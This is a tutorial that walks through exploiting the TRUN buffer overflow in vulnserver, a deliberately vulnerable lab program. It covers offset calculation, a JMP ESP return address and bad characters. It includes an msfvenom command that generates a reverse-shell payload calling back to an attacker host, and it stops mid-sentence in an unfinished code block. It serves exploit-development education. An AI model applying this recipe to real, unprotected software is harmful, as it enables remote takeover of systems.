Buffer Overflow - Explained

An in-depth guide on a basic buffer overflow and the details behind developing an exploit for it.

Last updated 10 months ago

Motivation

Buffer overflows have been covered by a lot of people in hundreds of writeups, videos and blogs. However, while teaching this subject to myself I often found phrases or explanations that left out important details, were immensely vague or even turned out to be straight up false.

Since I like to get into the details of how things work and why they work, I decided to share the entire manual process of dissecting one very common and basic buffer overflow.

For this I will use the vulnserver, specifically the TRUN command - starting from confirming the vulnerable entry point all the way up to spawning a reverse shell without taking any guesses.

It is entirely up to you whether you use this resource as a supplement or as a standalone read.

If this is your first time ever reading about buffer overflows - or you just want a quick hands-on intro - maybe check out my Final Notes first. There you'll find some good YouTube tutorials with the typical and far more practical approach. Here we're all about the details.

The Vulnserver

Introducing one of the most common applications used for practicing buffer overflows:

As stated in the description, this is an intentionally vulnerable application with the sole purpose of learning different sorts of buffer overflows. Here, we are going to concentrate on the most basic scenario that's built in to the TRUN command (one of the many commands the vulnserver offers upon connecting to it).

Setup

If you want to follow along, you'll need some tools:

VMware or VirtualBox for creating a virtual lab environment
- Make sure to put both VMs in the same network - preferably NAT Network in VBox and NAT in VMware
A virtual machine for the attacker - I'll use Kali Linux
A Windows virtual machine for the target (I'll use Windows 11)
- Once set up, make sure to disable Real-time protection
- Download vulnserver from https://github.com/stephenbradshaw/vulnserver
  - You need at least the essfunc.dll and vulnserver.exe in the same directory
- Process Explorer (Windows Sysinternals)
- A hexeditor like Hexinator

32-bit Stack Basics

Before we start looking at any code or exploit I want to give a brief introduction to the 32-bit stack.

This is not meant to be a comp-sci class. I'll assume some basic computer knowledge.

First of all, what and where is the stack?

The stack is a memory region in the address space of a process (ultimately backed by the RAM in your computer). Simply speaking it's a "last-in-first-out" (LIFO) structure that stores the local variables a function needs to remember or work with.

In the image below you can see the location of the stack in a broad depiction of the entire memory.

Notice that the highest address is at the top (32 bits of '1' or 4 bytes 0xff) and the lowest address is at the bottom. We can also see that there is a free memory region below the stack that can be used to allocate more space when needed (for example when calling a new function). Keep in mind that the stack grows towards lower addresses -> meaning the stack grows down.

Always pay attention to the direction a stack is depicted by looking at the addresses. Some tools and resources reverse the layout and put the highest address at the bottom. Suddenly the stack "grows upwards" visually.

To avoid any confusion, following is an example of the stack and its memory addresses plus the terms I will use to reference the stack in the future. The "bottom of the stack" faces towards the highest address and the "top of the stack" (i.e. the last item that was pushed on it) is located towards the lowest address.

Yes, it's visually counter intuitive to name the lower address the top of the stack but logically it makes sense as we push to and pop from the top.

So how does the stack work and why is it important for us?

In addition to normal local variables a program will also save some meta values on the stack. These values help the program to keep track of things like "where do I return to when the current function ends" and "where are my arguments". And they are stored on the stack in a standardized way.

To be more explicit, I am talking about the contents of the (extended) base pointer (EBP) and the (extended) instruction pointer (EIP) registers that are both pushed on the stack whenever a function is called.

The final register that'll be important for us is the (extended) stack pointer (ESP). Its content is always the lowest stack address that is currently in use (i.e. it points to the top of the stack).

If you don't feel familiar with the terms ESP, EIP and EBP I would advise you to do some basic research on those before continuing.

Let's break down the basic order in which the stack is being filled when a function is called:

The caller pushes any arguments it wants to pass to the callee on the stack
The content of the instruction pointer register (i.e. the address of the next instruction after the function call) is pushed on the stack
The content of the base pointer register is pushed by the callee
The stack pointer is decreased by the amount of requested memory space for local variables (12 bytes in the example below) (remember: decreasing the ESP means growing the stack)

Below you can see an exemplary stack with fictional contents during a function call.

Let's try to examine that scenario.

The EIP points to the next instruction to be executed (0x77864A5C - the next instruction inside our current function).

The EBP points to the base of the current stack frame - basically it's an anchor to reference local variables easily - here we have 0x0060DF1C. At this memory address we also find the previous frame pointer, which we can later load back into the EBP register to restore the previous function scope.

At EBP + 0x4 (4 bytes above the EBP) we find the instruction pointer that was saved when this function was called. When the current function ends this value will be loaded (pop'ed) back into the EIP and program execution will continue at this address.

At EBP + 0x8 we can find a parameter that was passed to the current function: 0xDEADBEEF in little endian format.

If you have difficulties following along so far I can suggest this resource which describes the steps from above (and more) in way greater detail: https://textbook.cs161.org/memory-safety/x86.html.

Below the EBP we see 12 bytes that were allocated and the ESP pointing to the top of that space. In this example this buffer was filled with the string "ABCDEFGHIJKL" (we're viewing the hexadecimal representation of the ASCII values).

Note that, since x86 stores multi-byte values in little endian format, an ASCII string like "ABCD", which lies on the stack as the bytes 0x41 0x42 0x43 0x44, will be interpreted as the 32-bit value 0x44434241 when used as a pointer, for example.
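
A quick way to convince yourself of this byte order is Python's struct module. The snippet below is only an illustration of the interpretation described above; the variable names are made up for the example.

```python
import struct

raw = b"ABCD"  # bytes as they lie in memory, lowest address first

# "<I" = little endian, unsigned 32-bit integer
as_pointer = struct.unpack("<I", raw)[0]
print(hex(as_pointer))  # 0x44434241

# The reverse direction: how the value 0xDEADBEEF is laid out in memory
in_memory = struct.pack("<I", 0xDEADBEEF)
print(in_memory.hex())  # efbeadde
```

The same packing step comes back later whenever an address has to be written into a payload byte by byte.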

As you can see, the buffer starts at the lowest address and is being filled up continuously.

So what happens when we start writing more than 12 bytes into that buffer? We overflow it.

After overflowing the 4 bytes of the frame pointer that lies directly over the buffer we can also overwrite the return address. That would allow us to redirect the execution flow to anywhere we want as soon as the current function ends.

To conclude this introduction, here is a visual representation of what the basic idea of a buffer overflow looks like.
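
The same idea can be played through on a toy model. The following is a minimal sketch, assuming a frame that consists only of the 12 byte buffer, the saved EBP and the saved EIP from the example; the saved values and helper names are made up, and a Python bytearray stands in for real stack memory.

```python
import struct

BUF_SIZE = 12  # size of the local buffer from the example above

def build_frame(saved_ebp: int, saved_eip: int) -> bytearray:
    """Lay out buffer | saved EBP | saved EIP from low to high addresses."""
    return bytearray(BUF_SIZE) + struct.pack("<II", saved_ebp, saved_eip)

def unsafe_copy(frame: bytearray, data: bytes) -> None:
    """Copy data to the start of the buffer without any length check."""
    frame[0:len(data)] = data

def read_saved_eip(frame: bytearray) -> int:
    """Read the 4 bytes that sit right above the saved EBP."""
    return struct.unpack_from("<I", frame, BUF_SIZE + 4)[0]

frame = build_frame(saved_ebp=0x0060DF3C, saved_eip=0x00401234)  # made-up values

unsafe_copy(frame, b"ABCDEFGHIJKL")        # fits exactly, nothing is damaged
print(hex(read_saved_eip(frame)))          # 0x401234

unsafe_copy(frame, b"A" * 12 + b"BBBB" + b"CCCC")  # 8 bytes too many
print(hex(read_saved_eip(frame)))          # 0x43434343
```

After the second copy the "return address" consists of the bytes we supplied, which is exactly the situation we want to create on the target.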

With the theory at hand now let's dive into the practical part and examine the vulnserver.

Locating the BOF

Let's look at the vulnserver. We know that for a buffer overflow to occur all we need is an unsafe way of writing an arbitrary amount of bytes to a buffer that's located on the stack.

Usually, finding such a potential vulnerability can be done by spiking the target application - but we'll try to identify the vulnerability manually (in the code) instead.

Spiking is the process of testing an application with many different sorts of inputs in order to find a pattern that can cause a crash.

Using the manual approach obviously takes a lot longer because we have to look at the (decompiled) source code. But sooner or later we come across this Function3.

Regardless of whether we had decompiled the .exe or gained access to the source code - we can see that in Function3 an array of unchecked length is copied into a buffer of a fixed length (2000 bytes as per the source code) using strcpy. Hence, if the input was larger than the target buffer (Buffer2S) we'd overflow it.

In case you wondered about the destination size (2008 vs. 2000 bytes), we'll see Ghidra's reason for displaying 2008 in a second when we look at the disassembly.

The manpage even warns about the unsafe use of strcpy - and there doesn't seem to be any safety check in place. At least not in this function. So let's find out how we can trigger this function and whether we can control the input arbitrarily.

Triggering the BOF

Looking at the function references we can quickly identify the only place where Function3 is being called from. Once again, we can get this information from either the decompiled or source code.

With a tiny bit of reverse engineering we can outline the following steps:

The RecvBuf contains all the bytes that were sent to the server and will be named "input" from here on.

First the input must start with the five characters "TRUN "
Then a buffer with 3000 elements is allocated and filled with zero (TrunBuf)
If the input contains a '.' character anywhere starting from the 6th character
- then the first up to 3000 bytes from the input are copied to TrunBuf
- and Function3 is called with TrunBuf as argument

The rest of the code clears TrunBuf and sends a hardcoded answer to the client but that's not important for us because we already got everything we need. Apparently we can cause the program to copy up to 3000 bytes of our input (that must start with at least "TRUN .") into a buffer that's only ~2000 bytes large when TrunBuf is passed to Function3.
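
The conditions above can be written down as a small Python model. This is only a sketch of the steps as outlined here, not the server's actual code: the function names are hypothetical, and the single null byte that strcpy appends is ignored for simplicity.

```python
from typing import Optional

TRUN_BUF_SIZE = 3000   # size of TrunBuf as described above
BUFFER2S_SIZE = 2000   # size of the destination buffer in Function3

def bytes_passed_to_function3(data: bytes) -> Optional[bytes]:
    """Return what would be handed to Function3, or None if it is never called."""
    if not data.startswith(b"TRUN "):
        return None
    if b"." not in data[5:]:
        return None
    # strncpy copies at most 3000 bytes and stops at the first null byte
    return data[:TRUN_BUF_SIZE].split(b"\x00", 1)[0]

def overflows(data: bytes) -> bool:
    """True if the copied string is longer than the 2000 byte buffer."""
    copied = bytes_passed_to_function3(data)
    return copied is not None and len(copied) > BUFFER2S_SIZE

print(overflows(b"TRUN ." + b"X" * 2994))  # True
print(overflows(b"TRUN " + b"X" * 2995))   # False, no '.' in the input
print(overflows(b"TRUN .hello"))           # False, far too short
```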

We now combined the first couple of pieces to find a way of overflowing Buffer2S.

To compare with usual tutorials, first you would have spiked the application to find that a large input containing a "." can crash the TRUN command and subsequently you would have fuzzed* the target to reveal that a length somewhere between 2000 and 3000 suffices. (*Fuzzing - sending inputs of increasing length until one causes a crash)

Calculating the Offset

So far we know that a simple string like this: 'TRUN .' + 'X'*2994 (python syntax) would crash the target. (Remember that at most 3000 bytes are taken from our input so we don't have to bother sending any more than that.)

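Actually, we can be fairly certain that a 2100 byte long input would also be enough. Since there were no other visible local variables in the vulnerable function, the saved EBP and the saved return address (the return instruction pointer, RIP from here on, not to be confused with the 64-bit register of the same name) are likely to be very close to the buffer.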

However, in order to write an exploit that overwrites the RIP with a precise value we are going to need the exact offset of the RIP to the buffer we are overflowing.

This step is typically called "finding the offset" and describes the use of a unique pattern that is sent to the target. The attacker then uses a debugger to find the value in the EIP at the time of the crash and searches that sequence in the original pattern, thus finding the offset of the bytes that overwrite the RIP.
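
For comparison, here is a minimal sketch of that pattern approach. The pattern has the same Aa0Aa1Aa2... shape that generators such as Metasploit's pattern_create produce, but the two functions are written from scratch for this example, and the crash value is simulated instead of being read from a debugger.

```python
import struct
from itertools import product
from string import ascii_uppercase, ascii_lowercase, digits

def create_pattern(length: int) -> bytes:
    """Build a pattern like Aa0Aa1Aa2... in which every 4-byte window is unique."""
    triplets = ("".join(t) for t in product(ascii_uppercase, ascii_lowercase, digits))
    pattern = "".join(triplets)
    if length > len(pattern):
        raise ValueError("pattern would start to repeat")
    return pattern[:length].encode("ascii")

def find_offset(pattern: bytes, eip_value: int) -> int:
    """Locate the 4 bytes that ended up in EIP (little endian) inside the pattern."""
    return pattern.find(struct.pack("<I", eip_value))

pattern = create_pattern(3000)

# Simulated crash: pretend the debugger showed these 4 pattern bytes in EIP
simulated_eip = struct.unpack("<I", pattern[2012:2016])[0]
print(find_offset(pattern, simulated_eip))  # 2012
```

Note that the result is an offset inside the pattern. If the pattern is sent after a prefix such as "TRUN .", the length of that prefix has to be added to get the offset from the start of the copied data.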

Although the debugger would be the faster choice and definitely easier to use when the code is more complex, let's see what happens under the hood of Function3. For this purpose we'll have a look at the disassembled code.

If you have never read assembly before this might look intimidating at first but we'll walk through it.

The very first line shows the label of this function (_Function3) and the argument that is passed: arg_8h. As we've seen in the source code already this is an address pointing to our input.

The following three lines list some references and their relative addresses (kind of like variables but not quite like that!).

The char* reference dest points at "base pointer - 0x7d8"
(Remember the 2008 from Ghidra? Since there is literally no other size indication or boundary to this array, Ghidra assumed the size of that array to be 0x7d8 or decimal: 2008.)
The char* argument arg_8h references "base pointer + 0x8" (Remember the graphic from the stack introduction? - "base pointer + 4" is the RIP and "base pointer + 8" is an argument to the current function)
The char* reference src points at "stack pointer + 0x4". Derived from the call to strcpy and conveniently for us, the names src and dest already hint to what these addresses are going to be used for.

All the pointers might be hard to visualize in mind the first time, so we will draw the stack out in a second. But before we do that let's cover the first three instructions of this function - the "prologue" which basically initiates this function on the stack.

push ebp: Store the current contents of the base pointer register on the stack - just like we discussed in the stack intro. The push instruction will automatically decrease the stack pointer so that it points to the top of the stack (to the last element that was pushed).
mov ebp, esp : Move the contents of the stack pointer to the base pointer register. Now both the EBP and the ESP point to the last item on the stack (which is the previous EBP value).
sub esp, 0x7e8 : Subtract 0x7e8 (decimal: 2024) from the stack pointer, thus increasing the stack.
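
The effect of these three instructions on the two registers can be traced in a few lines of Python. This is a sketch under assumptions: the starting ESP is chosen so that the results line up with the example addresses quoted in this chapter, the caller's frame pointer is made up, and a dictionary stands in for stack memory.

```python
# Assumption: right after the call, ESP points at the saved return address.
esp = 0x0060DF14
ebp = 0x0060DF9C   # made-up frame pointer of the caller

stack = {}          # address -> 32-bit value, a stand-in for real memory

# push ebp
esp -= 4
stack[esp] = ebp

# mov ebp, esp
ebp = esp

# sub esp, 0x7e8
esp -= 0x7E8

print(hex(ebp))          # 0x60df10
print(hex(esp))          # 0x60d728
print(hex(ebp - 0x7D8))  # 0x60d738, the start of dest
```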

So currently the stack looks like this:

With the next four instructions we get the following layouts:

Basically, the pointer to our input buffer (the 3000 byte array) is now stored at 0x0060D72C.

And now we stored the address 0x0060D738 (that was previously labelled dest) at 0x0060D728.

Remember the references from the first three lines? The address that's now on the top of the stack (visual bottom) was referenced with dest and the value below the top was named src. That's because the next instruction is a call to the function sym._strcpy and we know that before we call a function we must push its arguments to the stack.

As a side note, x86 calling conventions state that the arguments to a function shall be pushed on the stack in reversed order. So the last argument to a function must be pushed first (lands at the higher address).

So when calling strcpy(destination, source) - indeed the value at the top of stack becomes the destination address and the value below that becomes the source address.

This leads us to the conclusion that we will copy up to 3000 bytes from our input to the address 0x0060D738 in the example above. As a reminder, this means that starting from the address 0x0060D738 we write characters to increasing addresses. After a certain number of bytes (the offset) we will start to write at the position of the saved instruction pointer. Finally, the offset to the RIP can be calculated easily:

"Address of the RIP" - "Start address of the overflowing buffer" = Offset

In our case that's 0x0060DF14 - 0x0060D738 = 2012 bytes.

It doesn't matter what addresses we choose in our example because we only care about the distance between the two addresses.

So now we successfully calculated the exact amount of bytes that we need to put on the stack before we start overwriting the RIP: 2012.

(Of course we could've just taken the offset of the destination buffer immediately: ebp-0x7d8 and then add 0x4 to account for the ebp and we'd get the same result - but knowing the details of why that works was worth the long way in my opinion.)
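
Both ways of arriving at the offset can be checked with a few lines of arithmetic. The frame pointer value below is just an example, since only the distances matter.

```python
EBP = 0x0060DF10             # example frame pointer, only the distances matter

dest_start = EBP - 0x7D8     # dest, as listed in the disassembly
saved_rip_at = EBP + 0x4     # the return address sits right above the saved EBP

offset = saved_rip_at - dest_start
print(hex(dest_start), hex(saved_rip_at), offset)  # 0x60d738 0x60df14 2012

# The shortcut: distance from the buffer to EBP plus the 4 bytes of the saved EBP
shortcut = 0x7D8 + 0x4
print(shortcut)  # 2012
```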

Finding a Path to Exploitation

So far we know exactly how to overwrite the return instruction pointer and have the option to put in any address that we like. But how do we choose which address to use?

The goal now is to find a suitable return address - and that's most often done using mona.py and Immunity Debugger. However, let's try to break down the steps that are made for us here.

Before investigating the overflow further we should check for any security measures. In principle, since the buffer overflow is a rather old vulnerability, executables can be protected in a lot of ways that each prevent or at least impede different exploitation techniques.

The most prominent protection mechanisms that are going to be important for us are Address Space Layout Randomization (ASLR) and Data Execution Prevention (DEP). Feel free to dig deeper into other mechanism as well but here I'll just focus on briefly covering these two.

Address Space Layout Randomization - ASLR

Without any protection enabled, a program that's being loaded into memory would always land at the exact same virtual address. Because of this predictability, an adversary could easily calculate the address of any instruction in that binary and use it in an overflow attack.

ASLR forces the memory addresses to be randomized - so the program will land at a different address each time it is loaded. Consequently, the attacker can not predict an address and will have a harder time finding a suitable one.

Data Execution Prevention - DEP

DEP, also called NX (which stands for No eXecute), is a protection that prevents the CPU from executing any commands that reside in certain memory areas (such as the stack). If we were to attempt execution of commands placed inside our buffer on the stack while DEP is active - then our program would terminate with a memory access violation exception.

Both measures have been around for quite some time and should be enabled whenever developing an application, especially when using a language like C.

Note that even when used together they could still be bypassed using some sort of address leak and return oriented programming - but that's out of scope here.

Coming back to the vulnserver, we can check an executable for enabled ASLR and DEP by inspecting the PE headers. Below you'll find the output of a tool called winchecksec that extracts the relevant values and prints them.

We notice that neither ASLR nor DEP (NX in this output) are enabled. Meaning that we:

know where vulnserver.exe will be in memory and
are able to execute arbitrary code that we can put on the stack.
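
To see where these two values come from, the relevant header field can also be read by hand. The following is a minimal sketch that only looks at the DllCharacteristics field of the PE optional header; a tool like winchecksec checks considerably more than that, and the function names here are made up for the example.

```python
import struct

DYNAMIC_BASE = 0x0040  # IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE (ASLR)
NX_COMPAT = 0x0100     # IMAGE_DLLCHARACTERISTICS_NX_COMPAT (DEP)

def read_dll_characteristics(image: bytes) -> int:
    """Return the DllCharacteristics field of a PE file given as bytes."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    pe_offset = struct.unpack_from("<I", image, 0x3C)[0]   # e_lfanew
    if image[pe_offset:pe_offset + 4] != b"PE\x00\x00":
        raise ValueError("PE signature not found")
    optional_header = pe_offset + 4 + 20                   # signature + COFF header
    return struct.unpack_from("<H", image, optional_header + 70)[0]

def protections(image: bytes) -> dict:
    """Report whether the ASLR and DEP flags are set in the header."""
    flags = read_dll_characteristics(image)
    return {"ASLR": bool(flags & DYNAMIC_BASE), "DEP": bool(flags & NX_COMPAT)}

# Usage on a real file (path is an example):
# with open("vulnserver.exe", "rb") as f:
#     print(protections(f.read()))
```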

With that information we are ready to come up with a first plan for our exploit.

Either we put our exploit code - remember our goal is to spawn a reverse shell, so from here on I'll refer to that code as shellcode - at the very beginning of our buffer or after the RIP. (We will ignore other techniques such as ROP for brevity here.)

However, in both scenarios the RIP should point to the start of the code - which is an address somewhere on the stack. While we know the address of any instruction in our executable, unfortunately we don't know the exact address of our overflown buffer on the stack.

Although ASLR is disabled for the vulnserver.exe, each connection handler is spawned in a new thread via the Kernel32.dll, which does have ASLR enabled as we'll see in a bit, thus also randomizing the stack address for the new thread.

Additionally, relying on a hardcoded stack address wouldn't be a very portable solution for an exploit anyway because the stack can depend on things like the OS version and environment.

So instead we'll be using another way to jump into the stack. To understand that technique, let's reiterate one more time over the exact contents of the stack and registers during runtime (feel free to skip ahead if you already know where I'm going with this, but for those new to the topic I hope that repeating the visualization of the stack might be useful).

So far this graphic shouldn't be surprising. After the call to strcpy was made, we've overflown the buffer and overwritten the previous EBP and RIP values stored on the stack. What's important is the next instruction (EIP points to it) and the one after that. Let's see what these do:

The leave instruction is responsible for cleaning up the allocated stack space of a function. It will revert the changes made to the ESP and point it to the current address stored in EBP, indicating that everything below that is now free stack space (it does not modify any values on the stack). In a second step the leave executes pop EBP which will load the value from the current top of the stack (expected to be the previous base pointer) into the EBP register and increment the ESP accordingly. Thus, after the leave and before the ret the ESP points to what should be the return instruction pointer.

The ret instruction will then cause a pop EIP causing the current value on the top of the stack to be loaded into the EIP register. Consequently, the next address at which execution would continue is 0x12121212 in this example. The pop also increases the ESP so that it continues to point at the top of the stack (right to what has previously been the function argument).

This may have been very verbose, but we've now learned that there is a register that contains an address pointing directly to our buffer (after the RIP value to be precise).
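
The two instructions can be replayed on a toy stack to confirm where the ESP ends up. This is only a sketch: the addresses are example values, the 0x11111111 and 0x13131313 contents are made up, and a dictionary stands in for memory.

```python
# Toy stack after the overflow: address -> 32-bit value
stack = {
    0x0060DF10: 0x11111111,  # overwritten saved EBP
    0x0060DF14: 0x12121212,  # overwritten return address (RIP)
    0x0060DF18: 0x13131313,  # first bytes of our input that follow the RIP
}
regs = {"esp": 0x0060D728, "ebp": 0x0060DF10, "eip": None}

def pop(reg: str) -> None:
    """Load the value at the top of the stack into reg and move ESP up."""
    regs[reg] = stack[regs["esp"]]
    regs["esp"] += 4

# leave = mov esp, ebp ; pop ebp
regs["esp"] = regs["ebp"]
pop("ebp")

# ret = pop eip
pop("eip")

print({name: hex(value) for name, value in regs.items()})
# {'esp': '0x60df18', 'ebp': '0x11111111', 'eip': '0x12121212'}
```

After the ret, EIP holds the value we placed in the RIP slot and ESP holds the address of the bytes directly behind it.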

The reason we've looked at this particular step in detail is that some tutorials and guides talk about "overflowing the ESP", "writing to the ESP" or "the ESP containing shellcode" which is very misleading. The ESP is a register and it contains a 4 byte address!

Coming back to our task at hand, we may not know a stack address ourselves but we do know a register that contains the address required for exploit Variant B to work.

Combining this with our ability to predict addresses of instructions in the vulnserver's code, we can now make a new exploit plan that attempts to redirect execution to a JMP ESP instruction somewhere in that code. The JMP ESP will then cause the CPU to jump to the address stored in ESP which we know points to our shellcode.

It seems that all that's left to do is to find the address of a JMP ESP instruction somewhere in the vulnserver's code.

We previously found out that we can predict any address of instructions in code segments due to disabled ASLR. But how exactly?

Let's dig a bit more into that statement. The default address for an executable in memory is 0x00400000 and over here you'll find a great resource on the why for that. But more interestingly, you can confirm that yourself by looking at the base address during runtime.

If you remember the memory layout from the introduction now you may notice the abstraction that I made. If it were to be made precise then the text segment should indeed start at 0x00400000 instead of 0x00000000.

For the purpose of viewing the active vulnserver, its libraries and their addresses we can use a Windows Sysinternals tool called Process Explorer. Below you can see a screenshot of that:

In the bottom pane, that lists loaded libraries and details about the vulnserver process, we can see a column called ASLR. You'll notice that ASLR is not only disabled for the .exe itself but also for a .dll (dynamically linked library) called essfunc.dll (it was part of the vulnserver download).

Most importantly though, we can see the Image Base addresses for these code regions. The vulnserver.exe does indeed reside at 0x00400000. Note that we can also write down the base address for the essfunc.dll (0x62500000) as it does equally serve as a pool of possible instructions for us to jump to with ASLR disabled.

Knowing the base addresses of these code segments and knowing that they won't ever be randomized or changed, we can search for instructions in these code segments and get their virtual address by adding their offset inside the loaded image to that base address (which, as we'll see in a moment, is not the same as the raw file offset).

To find a JMP ESP instruction in the vulnserver.exe we can't just simply search for a string because it's a binary file. It consists of the binary assembler commands for the CPU (amongst headers and other regions). Instead, one possible way of finding an instruction is to search for the corresponding opcode - the hexadecimal value of said instruction.

Using an (online) assembler or Google we can quickly determine that the opcode for a JMP ESP instruction consists of the two bytes 0xFF 0xE4. We can now use a simple hexeditor like Hexinator to open the vulnserver.exe and search for the byte sequence FFE4.
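
If you'd rather script that search than click through a hexeditor, a few lines of Python do the same job. This is a minimal sketch with a made-up helper name; the sample bytes are a stand-in so the snippet runs without any file, and keep in mind that a plain byte search can't tell whether a match lies in code or in data.

```python
from typing import List

JMP_ESP = bytes([0xFF, 0xE4])

def find_all(data: bytes, needle: bytes) -> List[int]:
    """Return the offsets of every occurrence of needle in data."""
    offsets = []
    pos = data.find(needle)
    while pos != -1:
        offsets.append(pos)
        pos = data.find(needle, pos + 1)
    return offsets

# Stand-in bytes for the demo; for a real file use open(path, "rb").read()
sample = bytes.fromhex("9090ffe4c3ffe4")
print([hex(o) for o in find_all(sample, JMP_ESP)])  # ['0x2', '0x5']
```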

I'll save you a few seconds by telling you that you won't find any such sequence in the vulnserver.exe though. It just doesn't occur.

However, remember that we also have the essfunc.dll at our disposal. Opening it in our favorite hexeditor and searching for FFE4 we get lucky.

Great, we found nine possible JMP ESP instructions (marked yellow)! Feel free to choose any one of them - I'll continue with the first one. And just as a reminder, yes, there are tools that can do all that and more for you.

Now to find the offset of that instruction one could be tempted to use the 0x5af that's displayed in the bottom left corner of the screenshot. And indeed, that's the offset of the instruction in this entire .dll file but, as mentioned before, the .exe and .dll consist of more than just code.

I went ahead and also marked the actual beginning of the code section inside the .dll with blue. So the code starts at 0x400 meaning that a file offset of 0x5af turns into a code offset of 0x1af.

This might seem like pulling a random hex number out of a hat at first, but referencing the PE headers one more time and examining the actual headers of the essfunc.dll with dumpbin we can see that every byte is accounted for:

Firstly, we can see the image base address that we already saw in the Process Explorer. This is the address at which the dll will be loaded. Secondly, we see the base of code being at an offset of 0x1000 - so the code section of the dll will start at 0x62501000 in memory. Finally, we also see the 0x400 (size of headers) that describes the offset of actual code in the dll.

Knowing these numbers we can continue to calculate the address at which the JMP ESP instruction is going to be in memory.

0x62500000 (base address) + 0x1000 (base of code) + 0x1AF (instruction offset in .dll) = 0x625011AF.

Finally, we successfully calculated a suitable return address to a JMP ESP instruction.

0x625011AF
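
The same calculation as a small function, using only the numbers from above. It's a sketch that assumes the instruction lies in the code section that starts at file offset 0x400; the constant and function names are made up.

```python
IMAGE_BASE = 0x62500000      # image base of essfunc.dll
CODE_RVA = 0x1000            # base of code (where the code section is mapped)
CODE_FILE_OFFSET = 0x400     # where the code starts inside the file

def file_offset_to_va(file_offset: int) -> int:
    """Translate an offset in the .dll file to a virtual address in memory."""
    offset_in_code = file_offset - CODE_FILE_OFFSET
    return IMAGE_BASE + CODE_RVA + offset_in_code

print(hex(file_offset_to_va(0x5AF)))  # 0x625011af
```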

Just to reiterate, with that information our plan for exploitation now looks like this:

TRUN .<padding to the length of 2012><0x625011AF><shellcode>

Determining Bad Characters

Before we can start looking at the shellcode we have to check for what's generally called "bad characters". In essence, bad characters are bytes that may malform our final payload on the target.

Comparing to the normal tutorial again, this step usually requires a trial and error sequence of sending all bytes (ranging from 0x00 to 0xFF) with a script and then observing the memory on the target to spot any differences.

Once we can look into the code though, we can deduce the bad characters manually. For this we simply follow the input buffer that contains the bytes we sent.

Result = recv(Client, RecvBuf, RecvBufLen, 0);

First the vulnserver receives at most 4096 (RecvBufLen) raw bytes from the Client socket and stores them in RecvBuf (a byte array). This includes all bytes ranging from 0x00 to 0xFF.

Focusing on the TRUN command, the next line that will deal with the RecvBuf is one we've already looked at during the chapter "Triggering the BOF":

strncpy(TrunBuf, RecvBuf, 3000);

Up to 3000 bytes from RecvBuf are copied into TrunBuf. From the manpage for strncpy we learn that this function

copies the string pointed to by src, including the terminating null byte ('\0'), to the buffer pointed to by dest.

So every byte after the first 0x00 will be discarded by this function. Thus, we can't have a 0x00 inside our payload before the shellcode ends!

The next step is the call to Function3 and the unsafe use of strcpy which has the same null byte behavior. Other than that there are no manipulations on the input buffer for the TRUN command.

We can therefore conclude that the only bad character for our buffer overflow is the null byte.

Other commands on the vulnserver (such as LTER) are a bit more restrictive and will manipulate the incoming bytes. You can view an example here. Feel free to cross check with the source code to see how the other bad characters come to exist.

It's important to note that the bad characters must also be taken into account when choosing a return address. If our return address included a 0x00 for example, we couldn't use it without ending our payload at that position. Luckily for us, 0x625011AF is without a null byte or we'd have to find a different address.
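
Such a check is easy to automate. Below is a minimal sketch with made-up helper names; the second address is a hypothetical one inside the vulnserver.exe, picked only to show what a rejected address looks like.

```python
import struct
from typing import List

BAD_CHARS = b"\x00"  # the only bad character for TRUN, as derived above

def bad_positions(data: bytes, bad: bytes = BAD_CHARS) -> List[int]:
    """Return the index of every bad character inside data."""
    return [i for i, b in enumerate(data) if b in bad]

def address_is_usable(address: int) -> bool:
    """An address is usable if none of its 4 bytes is a bad character."""
    return not bad_positions(struct.pack("<I", address))

print(address_is_usable(0x625011AF))  # True
print(address_is_usable(0x00401234))  # False, hypothetical address with a null byte
```

The same bad_positions helper can be run over the finished payload before sending it.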

Generating Shellcode

Moving on to the next step of our exploit creation. We got an offset, we got a JMP ESP instruction and we determined the bad characters. What's left to do is to create the shellcode and integrate it to our payload.

This is not a course on shellcode nor would I have the expertise to write on any of that in detail. So we'll only have a short look on how to create some before disassembling the first few instructions in the next chapter.

There are many ways to go about this part. We could google for common shellcode [1][2][...] (at your own risk), actually learn exploit development and write our own [1], or use a tool that does everything for us (how does that sound, huh?).

This is the moment where we'll blatantly copy what most tutorials demonstrate:

msfvenom -p windows/shell_reverse_tcp LHOST=10.0.2.15 LPORT=80 EXITFUNC=thread -b "\x00" -f py

Using msfvenom from the Metasploit framework we are generating a non-staged TCP reverse shell payload that will connect back to 10.0.2.15 (my Kali machine) on port 80. With EXITFUNC=thread we specify that our shellcode runs in a sub-thread and should not crash the application when this sub-thread ends. Lastly, we specify our one bad character to be omitted during generation with -b and set the output format to python with -f py.

Once we've got the shellcode as a sequence of bytes (raw instructions that will spawn our reverse shell on the target system) we can copy it for our final exploit payload.

Building a NOP Sled

As we're slowly approaching the final phase, there is one more thing to add to our payload that's often being mistreated in my opinion. The NOP sled. Simply speaking, the NOP or no-op instruction is an instruction that has no effect on anything other than the EIP register. The CPU executes it without doing anything and continues at the next address.

A NOP sled is a concatenation of lots of NOP instructions. Once the CPU hits one it will continue to increase the EIP until a normal instruction occurs. Note that sometimes a NOP sled can also refer to a bunch of instructions that just keep the status quo - such as incrementing and then decrementing a register for example.

What's sometimes taught for the vulnserver and the TRUN command is that "we must include a NOP sled because we don't know where the shellcode will be in memory" or something similar. - But as we found out previously, that's not the case. We know exactly where it'll be.

If you remember the chapter where we talked about different exploit variants, we drew return addresses that pointed directly into the stack. As I already stated back there, even when ASLR is disabled the stack address might not be entirely deterministic as it could slightly change from system to system or even from "with debugger attached" to "without debugger attached".

In order to defeat this uncertainty, one could then add a NOP sled on the stack before the shellcode and try to aim somewhere in the middle of that with the return address. Thus, as long as the EIP hit the NOP sled somewhere it would start to slide along the NOPs until executing the shellcode.

If you'd like to see an example for that technique you can check out my write up on the Binex room from TryHackMe here.

Anyway, since we're using the address of the JMP ESP we will land exactly at the first instruction of our shellcode. So there is no randomness involved. However, if we were to attempt exploitation without a NOP sled we'd still fail.

In order to understand why that is and how big of a NOP sled we need, we'll have to look at the first few instructions of the shellcode. Using an (online) disassembler we can investigate the first couple of bytes that msfvenom generated for us:

Although yours might look slightly different, when msfvenom used the shikata_ga_nai encoder (default) the first few instructions will consist of something like:

<some floating point operation>
FNSTENV [ESP-0xC]
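
If you don't have a disassembler at hand, the offsets can also be worked out by hand. The sketch below uses the first bytes of the shellcode from the exploit script in this guide; the instruction lengths and mnemonics are my own manual decoding, so treat them as an assumption and verify them against your disassembler, especially since your msfvenom output will differ.

```python
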